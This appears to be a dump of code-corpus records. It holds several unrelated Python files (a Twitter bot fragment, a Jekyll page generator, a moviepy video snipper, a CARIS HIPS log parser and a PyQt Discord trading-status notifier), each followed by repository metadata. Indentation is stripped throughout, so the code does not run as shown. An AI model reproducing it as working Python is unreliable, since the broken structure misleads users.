log.info("Catching up on missed tweets, take %s." % a)
old_tweets = twitter.search(q=config.track + " -filter:retweets", count=readback-5, tweet_mode='extended')['statuses']
for t in sorted(old_tweets, key=lambda t: t['id']):
decide(t)
log.info('Caught up on missed tweets, running queue.')
thread.start_new_thread(run_queue, ())
thread.start_new_thread(queuewatch, (900,))
log.info('Going into streaming mode')
filterstream.statuses.filter(track=[t.strip() for t in config.track.lower().split(' or ')])
except Exception, e:
log.warning('==Exception caught, restarting in 15 minutes==')
log.warning(str(e), exc_info=True)
time.sleep(900)
readback = config.read_back
| 49.143275 | 208 | 0.606057 | 2,216 | 16,807 | 4.481047 | 0.199007 | 0.019738 | 0.028197 | 0.01712 | 0.292346 | 0.211782 | 0.176032 | 0.1572 | 0.150554 | 0.117321 | 0 | 0.007423 | 0.262569 | 16,807 | 341 | 209 | 49.28739 | 0.793771 | 0.092402 | 0 | 0.216607 | 0 | 0.01083 | 0.23314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.021661 | null | null | 0.00361 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df92c2b640273d1fde6e35ef399b77e27ac3c838 | 6,847 | py | Python | script.py | Relex12/mywebsite_jekyll | 58a4536c3049f0f575b60dbcfb33789ea1a909ea | [
"MIT"
] | null | null | null | script.py | Relex12/mywebsite_jekyll | 58a4536c3049f0f575b60dbcfb33789ea1a909ea | [
"MIT"
] | null | null | null | script.py | Relex12/mywebsite_jekyll | 58a4536c3049f0f575b60dbcfb33789ea1a909ea | [
"MIT"
] | null | null | null | from os import path
from os import system
if (not path.exists("../Relex12.github.io/")):
raise FileNotFoundError("Relex12.github.io directory not found")
if (not path.exists("../Markdown-Table-of-Contents/")):
raise FileNotFoundError("Markdown-Table-of-Contents directory not found")
#####################
# FILES DECLARATION #
#####################
files = [
{"folder": "Decentralized-Password-Manager", "file":"README.md", "layout": "default",
"title": "Decentralized-Password-Manager", "link": "fr/Decentralized-Password-Manager", "output": "Decentralized-Password-Manager.md"},
{"folder": "Dictionaries", "file":"README.md", "layout": "default",
"title": "Dictionaries", "link": "Dictionaries", "output": "Dictionaries.md"},
{"folder": "Dictionaries", "file":"README-fr.md", "layout": "default",
"title": "Dictionaries", "link": "fr/Dictionaries", "output": "Dictionaries-fr.md"},
{"folder": "Genex", "file":"README.md", "layout": "default",
"title": "Genex", "link": "fr/Genex", "output": "Genex.md"},
{"folder": "Introduction-to-Computer-Science", "file":"README.md", "layout": "default",
"title": "Introduction to Computer Science", "link": "fr/Introduction-to-Computer-Science", "output": "Introduction-to-Computer-Science.md"},
{"folder": "Languages", "file":"README.md", "layout": "default",
"title": "Languages", "link": "fr/Languages", "output": "Languages.md"},
{"folder": "Languages", "file":"Sheets/Bash-Unix.md", "layout": "default",
"title": "Bash Unix", "link": "fr/Languages/Bash-Unix", "output": "Languages.Bash-Unix.md"},
{"folder": "Languages", "file":"Sheets/DOT.md", "layout": "default",
"title": "DOT", "link": "fr/Languages/DOT", "output": "Languages.DOT.md"},
{"folder": "Languages", "file":"Sheets/Git.md", "layout": "default",
"title": "Git", "link": "fr/Languages/Git", "output": "Languages.Git.md"},
{"folder": "Languages", "file":"Sheets/GDB.md", "layout": "default",
"title": "GDB", "link": "fr/Languages/GDB", "output": "Languages.GDB.md"},
{"folder": "Languages", "file":"Examples/Markdown.md", "layout": "default",
"title": "Markdown", "link": "fr/Languages/Markdown", "output": "Languages.Markdown.md"},
{"folder": "Languages", "file":"Sheets/JavaScript.md", "layout": "default",
"title": "JavaScript", "link": "fr/Languages/JavaScript", "output": "Languages.JavaScript.md"},
{"folder": "Lining-draw", "file":"README.md", "layout": "default",
"title": "Lining draw", "link": "Lining-draw", "output": "Lining-draw.md"},
{"folder": "Lining-draw", "file":"README-fr.md", "layout": "default",
"title": "Lining draw", "link": "fr/Lining-draw", "output": "Lining-draw-fr.md"},
{"folder": "Loup-garou", "file":"README.md", "layout": "default",
"title": "Loup-garou", "link": "fr/Loup-garou", "output": "Loup-garou.md"},
{"folder": "Markdown-Table-of-Contents", "file":"README.md", "layout": "default",
"title": "Markdown Table of Contents", "link": "Markdown-Table-of-Contents", "output": "Markdown-Table-of-Contents.md"},
{"folder": "Markdown-Table-of-Contents", "file":"README-fr.md", "layout": "default",
"title": "Markdown Table of Contents", "link": "fr/Markdown-Table-of-Contents", "output": "Markdown-Table-of-Contents-fr.md"},
{"folder": "Maths-for-IT", "file":"README.md", "layout": "default",
"title": "Maths for IT", "link": "fr/Maths-for-IT", "output": "Maths-for-IT.md"},
{"folder": "Relex12", "file":"README.md", "layout": "default",
"title": "Relex12 - Adrian Bonnet", "link": "null", "output": "index.md"},
{"folder": "Secret-Santa", "file":"README.md", "layout": "default",
"title": "Secret Santa", "link": "fr/Secret-Santa", "output": "Secret-Santa.md"},
{"folder": "Simple-Progress-Bar", "file":"README.md", "layout": "default",
"title": "Simple Progress Bar", "link": "Simple-Progress-Bar", "output": "Simple-Progress-Bar.md"},
{"folder": "Simple-Progress-Bar", "file":"README-fr.md", "layout": "default",
"title": "Simple Progress Bar", "link": "fr/Simple-Progress-Bar", "output": "Simple-Progress-Bar-fr.md"},
{"folder": "Voting-Systems-Comparison", "file":"README.md", "layout": "default",
"title": "Voting Systems Comparison", "link": "fr/Voting-Systems-Comparison", "output": "Voting-Systems-Comparison.md"},
{"folder": "Voting-Systems-Simulation", "file":"README.md", "layout": "default",
"title": "Voting Systems Simulation", "link": "Voting-Systems-Simulation", "output": "Voting-Systems-Simulation.md"},
{"folder": "Voting-Systems-Simulation", "file":"README-fr.md", "layout": "default",
"title": "Voting Systems Simulation", "link": "fr/Voting-Systems-Simulation", "output": "Voting-Systems-Simulation-fr.md"},
{"folder": "Voting-Systems-Simulation", "file":"doc/simulation.html", "layout": "null",
"title": "Voting Systems Simulation Doc", "link": "Voting-Systems-Simulation/doc/simulation", "output": "Voting-Systems-Simulation.doc.simulation.html"},
{"folder": "Voting-Systems-Simulation", "file":"doc/voting.html", "layout": "null",
"title": "Voting Systems Simulation Doc", "link": "Voting-Systems-Simulation/doc/voting", "output": "Voting-Systems-Simulation.doc.voting.html"},
{"folder": "Website-manager", "file":"README.md", "layout": "default",
"title": "Website manager", "link": "Website-manager", "output": "Website-manager.md"},
{"folder": "Word-machine", "file":"README.md", "layout": "default",
"title": "Word Machine", "link": "Word-machine", "output": "Word-machine.md"},
{"folder": "Word-machine", "file":"doc/dictionary.html", "layout": "null",
"title": "Word Machine Doc", "link": "Word-machine/doc/dictionary", "output": "Word-machine.doc.dictionary.html"},
{"folder": "Word-machine", "file":"doc/generation.html", "layout": "null",
"title": "Word Machine Doc", "link": "Word-machine/doc/generation", "output": "Word-machine.doc.generation.html"},
{"folder": "Word-machine", "file":"doc/word-machine.html", "layout": "null",
"title": "Word Machine Doc", "link": "Word-machine/doc/word-machine", "output": "Word-machine.doc.word-machine.html"},
]
####################
# FILES GENERATION #
####################
for i in range(len(files)):
if (path.exists("../{}/".format(files[i]["folder"]))):
system("python3 ../Markdown-Table-of-Contents/toc.py ../{}/{}".format(files[i]["folder"], files[i]["file"]))
input_file = open("../{}/{}".format(files[i]["folder"], files[i]["file"]), 'r')
front_matter = """---
layout: {}
title: "{}"
permalink: {}
---
""".format(files[i]["layout"], files[i]["title"], files[i]["link"], )
output_file = open("../Relex12.github.io/{}".format(files[i]["output"]), 'w')
print(files[i]["output"])
output_file.write(front_matter + input_file.read())
else:
print("Cannot create {}, {}/{} is missing.".format(files[i]["output"], files[i]["folder"], files[i]["file"]) )
| 67.792079 | 154 | 0.637505 | 816 | 6,847 | 5.341912 | 0.121324 | 0.049553 | 0.092911 | 0.123882 | 0.545309 | 0.432668 | 0.317963 | 0.186281 | 0.114935 | 0.069511 | 0 | 0.001778 | 0.096393 | 6,847 | 100 | 155 | 68.47 | 0.702764 | 0.005112 | 0 | 0 | 0 | 0 | 0.660175 | 0.209843 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.022989 | 0.022989 | 0 | 0.022989 | 0.022989 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10c36b8fc1840cfb5a40958316805cad9712d3bb | 8,254 | py | Python | snipmyvideo.py | rascoro1/SnipMyVideo | 0728684fa271ec140f90c7878e41d7e55eec1989 | [
"MIT"
] | 3 | 2016-07-22T00:34:50.000Z | 2016-09-02T16:52:23.000Z | snipmyvideo.py | rascoro1/SnipMyVideo | 0728684fa271ec140f90c7878e41d7e55eec1989 | [
"MIT"
] | 2 | 2016-09-06T04:11:44.000Z | 2018-01-29T21:57:51.000Z | snipmyvideo.py | rascoro1/SnipMyVideo | 0728684fa271ec140f90c7878e41d7e55eec1989 | [
"MIT"
] | 1 | 2016-09-02T20:39:25.000Z | 2016-09-02T20:39:25.000Z | from moviepy.editor import *
from moviepy import Clip
import sys
import os
"""
This is a simple script that can only snip your code and return it back in one video
This script requires moviepy.py
Is can be obtained through pip:
pip install moviepy
Output file can be '.mp4', 'ogv', 'webm'
You can modify script to output other files based off the codec.
Further reasearch into moviepy.VideoFileClip.write_videofile
Usage: SnipMyVideo.py video.mp4 output.mp4 30-60 90-120 20:20-20:40 1:20:15-1:30:15
E.g: This would create two snipets (unlimited snipets can be created),
the first snipet resembles the time 30seconds to 60 seconds from video.m94
These snipets are then concatenated and written to output.mp4
Only a couple lines actually using moviepy.
"""
###################### Declaring Globals ##################################
SCRIPT_NAME = "" # Name of the script
FNAME = "" # Input filename
OUT_FNAME = "" # Output filename
SNIPPETS = [] # Raw Snippet times given as arguments by the user
SNIPPET_TIMES = [] # Snippet times in seconds
VERBOSE = True # Turn to false if you would not like verbose information
IS_AUDIO_FILE = False
def check_num_of_arguments():
"""
Quick check to make sure the correct number of argumets are portrayed.
First function that is called
:return:
"""
if len(sys.argv) < 4:
print "You have not given enough Arguments"
print "usage: " + sys.argv[0] + " inputfile.mp4 outputfile.mp4 20-30"
print "Time is in seconds"
sys.exit(6)
def trim_arguments():
"""
This trims all of the input arguments from the user
and assagins information to the according global variable
:return:
"""
global SCRIPT_NAME, FNAME, OUT_FNAME, SNIPPETS
SCRIPT_NAME = sys.argv[0]
args = sys.argv[1:] # Trimming of SCRIPT_NAME
FNAME = args[0]
args = args[1:] # Timming off fname
OUT_FNAME = args[0]
SNIPPETS = args[1:] # Trimming off the output filename
del args # Delete old args (REPLACED BY GLOBAL)
def check_args():
"""
Make sure arguments are in the write format
"""
if not os.path.isfile(FNAME):
print "The Input file does not exist."
sys.exit(1)
if os.path.isfile(OUT_FNAME):
print "Output file already exists"
sys.exit(2)
if not os.path.isdir(os.path.abspath(OUT_FNAME).rstrip(os.path.basename(OUT_FNAME))):
print "Output file directory does not exists"
sys.exit(3)
def check_time(time, min, max):
"""
Check time submitted by user to make sure time is correct and follows a correct format
:param time: time requested by user
:param min: min possible value
:param max: max possible value
:return:
"""
if int(time) >= min and int(time) <= max:
return True
else:
return False
def convert_human_readable_time(time):
"""
Convert human readable format of time into seconds
:param time: human readable string format of 1:20:30 or 20:38 or 38
:return: int time in seconds
"""
if ':' in time: # The time follows the min:sec format and must be converted
time = time.split(':')
if len(time) == 2: # Min:Sec format
min, sec = time
verbose("convert_human_readable_time("+str(time)+")", "Min:Sec Format")
if check_time(min, 0, 59) and check_time(sec, 0, 59): # Making sure the times are between possible amounts
verbose("convert_human_readable_time(" + str(time) + ")", "time = " + str(min) + " * 60 + " + sec)
time = int(min) * 60 + int(sec)
else:
print("Incorrect Time has been submitted: " + str(time) + " min:sec 0:0-59:60")
sys.exit(10)
elif len(time) == 3: # Hour:Min:Sec format
hour, min, sec = time
verbose("convert_human_readable_time("+str(time)+")", "Hour:Min:Sec Format")
if check_time(hour, 0, 23) and check_time(min, 0, 59) and check_time(sec, 0, 59): # Making sure the times are between possible amounts
verbose("convert_human_readable_time(" + str(time) + ")", "time = " + str(hour) + " * 3600 + " + str(min) + " * 60 + " + sec)
time = int(hour) * 3600 + int(min) * 60 + int(sec)
else:
print("Incorrect Time has been submitted: " + str(time) + " hour:min:sec 0:0:0-23:59:59")
sys.exit(10)
try:
time = int(time)
except ValueError as e:
print "Value Error: Given time is not a digit" + e.message
sys.exit(8)
verbose("convert_human_readable_time(" + str(time) + ")", "Returned time is -> " + str(time))
return time # If the time does not need to be converted (does not contain ':') it will still be appened
def get_snippet_time(snippet):
"""
This allows for easier use of snipping longer videos
conversion of
hour:min:sec & min:sec & sec e.g 1:20:15 & 20:48 & secs
to seconds
:param args: One snippet of time start and end time
:return: Dict of snippet e.g. {'start':20, 'stop': 40}
"""
if "-" not in snippet: # Checking to see if snippet time was inputted correctly
print("The arguments for the snippet time is not in the correct format: " + snippet)
print("Correct usage is: 20-30 or 20:30-20:35 or 1:20:30-1:20:35 ")
sys.exit(7)
start, stop = snippet.split('-', 1) # start and stop times of snippet
start = convert_human_readable_time(start)
stop = convert_human_readable_time(stop)
snippet = {'start': start, 'stop': stop}
return snippet
def get_all_snippet_times():
"""
Get all the snippet times in seconds
:return:
"""
for snippet in SNIPPETS:
snippet = get_snippet_time(snippet)
for key in snippet:
if snippet[key] < 0:
print "Input must be a positive number"
sys.exit(5)
if snippet['start'] > snippet['stop']:
print('Start needs to be smaller than stop for snipet, exiting.')
verbose("check_args()", "start=" + str(snippet['start']) + ", stop="+str(snippet['stop']))
sys.exit(6)
SNIPPET_TIMES.append(snippet)
def determine_if_audio_file():
"""
"""
global IS_AUDIO_FILE
audio_file_extensions = (".mp3", ".m4a")
IS_AUDIO_FILE = True if FNAME.endswith(audio_file_extensions) else False
def get_snippets():
"""
:return: List of moviepy.subclip objects
"""
snippets = []
clip = AudioFileClip(FNAME) if IS_AUDIO_FILE else VideoFileClip(FNAME)
for snippet in SNIPPET_TIMES:
snippets.append(clip.subclip(snippet['start'], snippet['stop']))
print "Created Snippet:\n\tStarting: " + str(snippet['start']) + " STOPPING: " + str(snippet['stop'])
return snippets
def create_video(snippets):
"""
Concatinate all the snippets together into one movie and write
:param snippets: THis is a list of moviepy.subclip
:return: write out one file
"""
if not IS_AUDIO_FILE:
video = concatenate(snippets)
print "Combined Snipets into one Video"
print "Writing Video to " + OUT_FNAME
video.write_videofile(OUT_FNAME)
else:
audio = concatenate_audioclips(snippets)
print "Combined Snipets into one Audio File"
print "Writing Video to " + OUT_FNAME
audio.write_audiofile(OUT_FNAME)
def verbose(title, info):
"""
Loggin verbose notes when VERBOSE is True
Used for debuging and is very helpful
:param title:
:param info:
:return:
"""
if VERBOSE:
print SCRIPT_NAME + " -> " + str(title) + ": " + info
if __name__ == "__main__":
check_num_of_arguments() # Make sure we have the correct number of arguments
trim_arguments() # Trim the args to just have the snippets at the end
check_args() # check the args for correctness
get_all_snippet_times() # All snippet times in seconds and organized Also checked for correctness
determine_if_audio_file()
snippets = get_snippets() # Get all the moviepy.subclip objects for each snippet
create_video(snippets) # Concatinate the Snippets together
| 34.974576 | 146 | 0.63448 | 1,156 | 8,254 | 4.439446 | 0.239619 | 0.01286 | 0.035074 | 0.037412 | 0.15608 | 0.133476 | 0.096259 | 0.088854 | 0.088854 | 0.088854 | 0 | 0.026286 | 0.257936 | 8,254 | 235 | 147 | 35.123404 | 0.811592 | 0.118003 | 0 | 0.080645 | 0 | 0.008065 | 0.205354 | 0.032161 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032258 | null | null | 0.153226 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10d2a94ebd88d32ad26b964e29b12c2b154a5761 | 7,858 | py | Python | HSTB/drivers/hips_log.py | noaa-ocs-hydrography/drivers | d798a851b7b06c986c811a84242529038fd0b2b3 | [
"CC0-1.0"
] | 2 | 2021-04-28T17:37:30.000Z | 2022-01-28T21:56:17.000Z | HSTB/drivers/hips_log.py | noaa-ocs-hydrography/drivers | d798a851b7b06c986c811a84242529038fd0b2b3 | [
"CC0-1.0"
] | 1 | 2020-11-05T13:57:34.000Z | 2020-11-05T14:00:26.000Z | HSTB/drivers/hips_log.py | noaa-ocs-hydrography/drivers | d798a851b7b06c986c811a84242529038fd0b2b3 | [
"CC0-1.0"
] | 1 | 2021-04-09T08:29:54.000Z | 2021-04-09T08:29:54.000Z | import xml.etree.ElementTree as ElementTree
import os
class CARISObject:
"""A generic CARIS object with a name"""
def __init__(self):
"""Initialize with empty name"""
self.name = ''
def __init__(self, name):
"""Initialize with a name provided"""
self.name = name
def set_name(self, name):
"""Set the name"""
if name:
self.name = name
def get_name(self):
"""Return the name"""
return self.name
class CARISSource(CARISObject):
"""A CARIS source object under Process Model 1.0"""
def __init__(self):
"""Initialize with empty name, type and data"""
self.name = ''
self.stype = ''
self.sdata = ''
def set_type(self, dtype):
"""Set the type"""
if dtype:
self.stype = dtype
def set_data(self, data):
"""Set the data"""
if data:
self.sdata = data
def get_type(self):
"""Return the type"""
return self.stype
def get_data(self):
"""Return the data"""
return self.sdata
class CARISLog():
"""A CARIS log object under Process Model 1.0"""
def __init__(self):
"""Initialize with empty user, software, start/end times"""
self.user = ''
self.software = ''
self.startTime = ''
self.endTime = ''
def set_user(self, user):
"""Set the user"""
if user:
self.user = user
def set_software(self, software):
"""Set the software"""
if software:
self.software = software
def set_start_time(self, startTime):
"""Set the start time"""
if startTime:
self.startTime = startTime
def set_end_time(self, endTime):
"""Set the end time"""
if endTime:
self.endTime = endTime
def get_user(self):
"""Return the user"""
return self.user
def get_software(self):
"""Return the software"""
return self.software
def get_start_time(self):
"""Return the start time"""
return self.startTime
def get_end_time(self):
"""Return the end time"""
return self.endTime
class CARISPort(CARISObject):
"""A CARIS port under Process Model 1.0"""
def __init__(self):
"""Initialize with empty name and sources list"""
self.name = ''
self.sources = []
def set_sources(self, sources):
"""Set the sources list"""
if sources:
self.sources = sources
def get_sources(self):
"""Get the sources list"""
return self.sources
def get_source(self, index):
"""Get a source by index"""
return self.sources[index]
class CARISProcess(CARISObject):
""" A CARIS Process under Process Model 1.0"""
def __init__(self):
"""Initialize with empty name, version, ports dictionary, and log list"""
self.name = ''
self.version = ''
self.ports = {}
self.log = []
def set_version(self, version):
"""Set the version"""
if version:
self.version = version
def set_ports(self, ports):
"""Set the ports dictionary"""
if ports:
self.ports = ports
def add_port(self, name, port):
"""Add a port to the dictionary"""
if port:
self.ports[name] = port
def set_log(self, log):
"""Set the log list"""
if log:
self.log = log
def get_version(self):
"""Return the version"""
return self.version
def get_ports(self):
"""Return the ports dictionary"""
return self.ports
def get_port(self, name):
"""Return a port value by key"""
return self.ports[name]
def get_log(self):
"""Return the log list"""
return self.log
class HIPSLog:
"""
A class representing a HIPS line log.
Applicable only for logs created in HIPS v10.0.0 and above (Process.log)
"""
def __init__(self):
"""Initialize with empty source path, process list and version"""
self.source_path = ''
self.processes = []
self.version = ''
def __init__(self, log_path):
"""Initialize from an existing log path, which processes all entries into this object."""
self.source_path = log_path
self.processes = []
tree = ElementTree.parse(log_path)
root = tree.getroot()
self.version = root.find('version').text
for process in root.findall('process'):
proc_obj = self.__parse_process(process)
self.processes.append(proc_obj)
def set_source_path(self, path):
"""Set the source path"""
if path:
self.source_path = path
def set_version(self, version):
"""Set the version"""
if version:
self.version = version
def set_processes(self, process):
"""Set the processes list"""
if process:
self.processes = process
def get_source_path(self):
"""Return the source path"""
return self.source_path
def get_version(self):
"""Return the version"""
return self.version
def get_processes(self):
"""Return the list of processes"""
return self.processes
def get_process(self, index):
"""Return a specific process object by index"""
return self.processes[index]
def get_last_process(self, process_name):
"""Returns the last log entry of the provided name."""
return self.get_process(next(i for i, v in zip(list(range(len(
self.processes) - 1, -1, -1)), reversed(self.processes)) if v.get_name() == process_name))
def has_process(self, process_name):
"""Check if the process exists in the log"""
return any(process_name in s.get_name() for s in self.processes)
def __parse_process(self, process):
"""Internal process to parse the process XML"""
proc_obj = CARISProcess()
# set metadata
proc_obj.set_name(process.find('id').text)
proc_obj.set_version(process.find('version').text)
log = process.find('log')
log_obj = CARISLog()
log_obj.set_user(log.find('user').text)
log_obj.set_start_time(log.find('start').text)
log_obj.set_end_time(log.find('end').text)
soft = log.find('software')
log_obj.set_software(
soft.find('id').text +
' ' +
soft.find('version').text)
proc_obj.set_log(log_obj)
# add ports
for option in process.findall('port'):
opt_obj = self.__parse_port(option)
proc_obj.add_port(opt_obj.get_name(), opt_obj)
return proc_obj
def __parse_port(self, option):
"""Internal process to parse each port (option) of the log entry"""
opt_obj = CARISPort()
opt_obj.set_name(option.find('id').text)
for source in option.findall('source'):
src_obj = self.__parse_source(source)
opt_obj.sources.append(src_obj)
return opt_obj
def __parse_source(self, source):
"""Internal process to parse each source of a given port"""
src_obj = CARISSource()
data = source.find('data')
simple = data.find('simple')
if simple:
src_obj.set_name('simple')
src_obj.set_type(simple.find('type').text)
src_obj.set_data(simple.find('value').text)
else:
complex_v = data.find('complex')
if complex_v:
src_obj.set_name('complex')
src_obj.set_type('complex')
# simply store this part of the ETree
src_obj.set_data(complex_v)
return src_obj
| 27.865248 | 102 | 0.573556 | 977 | 7,858 | 4.452405 | 0.128966 | 0.024828 | 0.038851 | 0.028966 | 0.135172 | 0.123218 | 0.116322 | 0.108506 | 0.108506 | 0.108506 | 0 | 0.00277 | 0.310893 | 7,858 | 281 | 103 | 27.964413 | 0.800554 | 0.213286 | 0 | 0.155689 | 0 | 0 | 0.019293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.269461 | false | 0 | 0.011976 | 0 | 0.449102 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
10d567f52597f63ae873c81fa0c69444cf588834 | 6,863 | py | Python | uiConfig.py | g-ulrich/ScreenShotToDiscord | 7228d01637d426a2767a9531576880180a49c92f | [
"MIT"
] | null | null | null | uiConfig.py | g-ulrich/ScreenShotToDiscord | 7228d01637d426a2767a9531576880180a49c92f | [
"MIT"
] | null | null | null | uiConfig.py | g-ulrich/ScreenShotToDiscord | 7228d01637d426a2767a9531576880180a49c92f | [
"MIT"
] | null | null | null | from PyQt5.QtCore import QTimer, QTime
from PyQt5 import QtGui, QtWidgets
import time
import random
import os
import datetime
import requests
import sqlite3 as sql
import database_impl as db
from date_tools import dt
def datetime_diff(old_datetime, new_datetime, dates_are_strings=True):
"""
String dates should be in this format "%Y-%m-%d %H:%M:%S"
"""
seconds_in_day = 24 * 60 * 60
if dates_are_strings:
d1 = datetime.datetime.strptime(old_datetime, "%Y-%m-%d %H:%M:%S")
d2 = datetime.datetime.strptime(new_datetime, "%Y-%m-%d %H:%M:%S")
else:
d1, d2 = old_datetime, new_datetime
difference = d1 - d2
x = divmod(difference.days * seconds_in_day + difference.seconds, 60)
minutes, seconds = x[0], x[1]
return minutes, seconds
def current_time():
t = QTime.currentTime().toString()
am_pm = "pm" if 12 < int(t[:2]) < 23 else "am"
return t + " " + am_pm
def message_discord_server(message, user_data={}):
try:
discord_webhook_url = user_data['discordwebhook']
Message = {
"content": str(message)
}
requests.post(discord_webhook_url, data=Message)
except Exception as e:
print("ERROR discord", e)
class Presets:
def event_log(self, message):
t, c = current_time(), self.ui.mouseList.count()
self.ui.mouseList.setCurrentRow(c-1)
self.ui.mouseLastUpdate.setText(' {}'.format(t))
if c > 100:
self.ui.mouseList.clear()
self.ui.mouseList.addItem("CLEARED --> {}".format(t))
self.ui.mouseList.takeItem(c-1)
self.ui.mouseList.addItem("[{}] {}".format(t, message))
self.ui.mouseList.addItem("")
def init_ui(self):
self.ui.password.setEchoMode(QtWidgets.QLineEdit.Password)
self.ui.bar.setMaximum(100)
self.ui.bar.setValue(100)
self.setWindowIcon(QtGui.QIcon('images/discord.png'))
# Presets.mouse_loop(self)
self.ui.close.clicked.connect(lambda: self.close())
self.ui.minimize.clicked.connect(lambda: self.showMinimized())
self.ui.startBtn.clicked.connect(lambda: Presets.start(self))
self.ui.stopBtn.clicked.connect(lambda: Presets.stop(self))
self.ui.password.returnPressed.connect(lambda: Presets.start(self))
self.ui.stopBtn.hide()
def progress_bar_count(self):
self.ui.SECONDS -= 1
self.ui.bar.setValue(self.ui.SECONDS)
def start(self):
CON = sql.connect('userData/user.db')
if db.valid_login_password(CON, self.ui.password.text(), commit=False) and not db.select_stop_session_status(CON, commit=False):
self.ui.user_data = db.user_data_by_password(CON, self.ui.password.text(), commit=False)
if self.ui.mins.value() != 0.0 or self.ui.hrs.value() != 0.0:
self.ui.start_timer = QTimer()
self.ui.start_timer.timeout.connect(lambda: Presets.awake_loop(self))
hrs_to_secs, mins_to_secs = (self.ui.hrs.value() * 60) * 60000, self.ui.mins.value() * 60000
self.ui.start_timer.start(hrs_to_secs + mins_to_secs)
self.ui.SECONDS = (hrs_to_secs + mins_to_secs) / 1000
Presets.event_log(self, "Start")
Presets.event_log(self, "Interval set to {} minute(s).".format(self.ui.SECONDS / 60))
self.ui.bar.setMaximum(self.ui.SECONDS)
self.ui.bar.setValue(self.ui.SECONDS)
self.ui.progress_timer = QTimer()
self.ui.progress_timer.timeout.connect(lambda: Presets.progress_bar_count(self))
self.ui.progress_timer.start(1000)
self.ui.stopBtn.show()
self.ui.startBtn.hide()
else:
Presets.event_log(self, "Set an interval! :)")
else:
if not db.valid_login_password(CON, self.ui.password.text(), commit=False):
Presets.event_log(self, "Enter an application password. :)")
if db.select_stop_session_status(CON, commit=False):
Presets.event_log(self, "Start live trading session. :)")
def stop(self):
self.ui.start_timer.stop()
self.ui.progress_timer.stop()
self.ui.bar.setMaximum(100)
self.ui.bar.setValue(100)
Presets.event_log(self, "Stop")
self.ui.stopBtn.hide()
self.ui.startBtn.show()
def awake_loop(self):
CON = sql.connect('userData/user.db')
data = db.get_timestamps_from_livetrade(CON, commit=False)
# current set
current_min_diff, sec1 = datetime_diff(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"), data[-1])
# last set
previous_min_diff, sec2 = datetime_diff(data[-1], data[-2])
#second to last set
min3, sec3 = datetime_diff(data[-2], data[-3])
message = "_"
"""
if interval check is greater than min diff then success
"""
checkup_interval = self.ui.mins.value() + (self.ui.hrs.value() * 60)
livetrade_loop_rate = min3 if previous_min_diff == min3 else "unknown"
if data[-1] != "2000-01-01 00:00:00":
if checkup_interval < current_min_diff:
message = "```diff\n-Error! Application stopped live trading!\n-Stoppage occurred after: {}\n``` ".format(data[-1])
elif current_min_diff > previous_min_diff:
message = "```ini\n[Warning! Application either slowed down or stopped live trading.]\n[Last loop occurrence: {}]\n``` ".format(data[-1])
else:
message = "```diff\n+Success! Application is live trading.\n+Last loop occurrence: {}\n+Live Trade Loop Rate: {} minute(s)``` ".format(data[-1], livetrade_loop_rate)
else:
lastItem = self.ui.mouseList.currentItem().text()
if "bypassing" not in lastItem or "_" not in lastItem:
db.drop_table(CON, "live_trade_timestamps", commit=True)
db.insert_timestamp_livetrade(CON, data=("2000-01-01 00:00:00", ""), commit=False)
db.insert_timestamp_livetrade(CON, data=("2000-01-01 00:00:00", ""), commit=False)
db.insert_timestamp_livetrade(CON, data=("2000-01-01 00:00:00", ""), commit=True)
message = "Market Closed: bypassing checkup..."
Presets.event_log(self, message)
if message != "":
message_discord_server(message, self.ui.user_data)
Presets.event_log(self, "\n"+message.replace("```", "").replace("diff", "").replace("ini", ""))
hrs_to_secs, mins_to_secs = (self.ui.hrs.value() * 60) * 60000, self.ui.mins.value() * 60000
self.ui.SECONDS = (hrs_to_secs + mins_to_secs)/1000
self.ui.bar.setMaximum(self.ui.SECONDS)
self.ui.bar.setValue(self.ui.SECONDS)
| 43.713376 | 181 | 0.616203 | 911 | 6,863 | 4.503842 | 0.230516 | 0.086278 | 0.026322 | 0.037046 | 0.32001 | 0.291981 | 0.263709 | 0.219352 | 0.165489 | 0.165489 | 0 | 0.030233 | 0.243334 | 6,863 | 156 | 182 | 43.99359 | 0.759869 | 0.017776 | 0 | 0.192 | 0 | 0.024 | 0.115344 | 0.003162 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072 | false | 0.064 | 0.08 | 0 | 0.176 | 0.008 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
10db0a1461dd4901dea43c8088f2d331ca5bbb5e | 908 | py | Python | icetray/resources/test/shoulddo.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | [
"MIT"
] | 1 | 2020-12-24T22:00:01.000Z | 2020-12-24T22:00:01.000Z | icetray/resources/test/shoulddo.py | hschwane/offline_production | e14a6493782f613b8bbe64217559765d5213dc1e | [
"MIT"
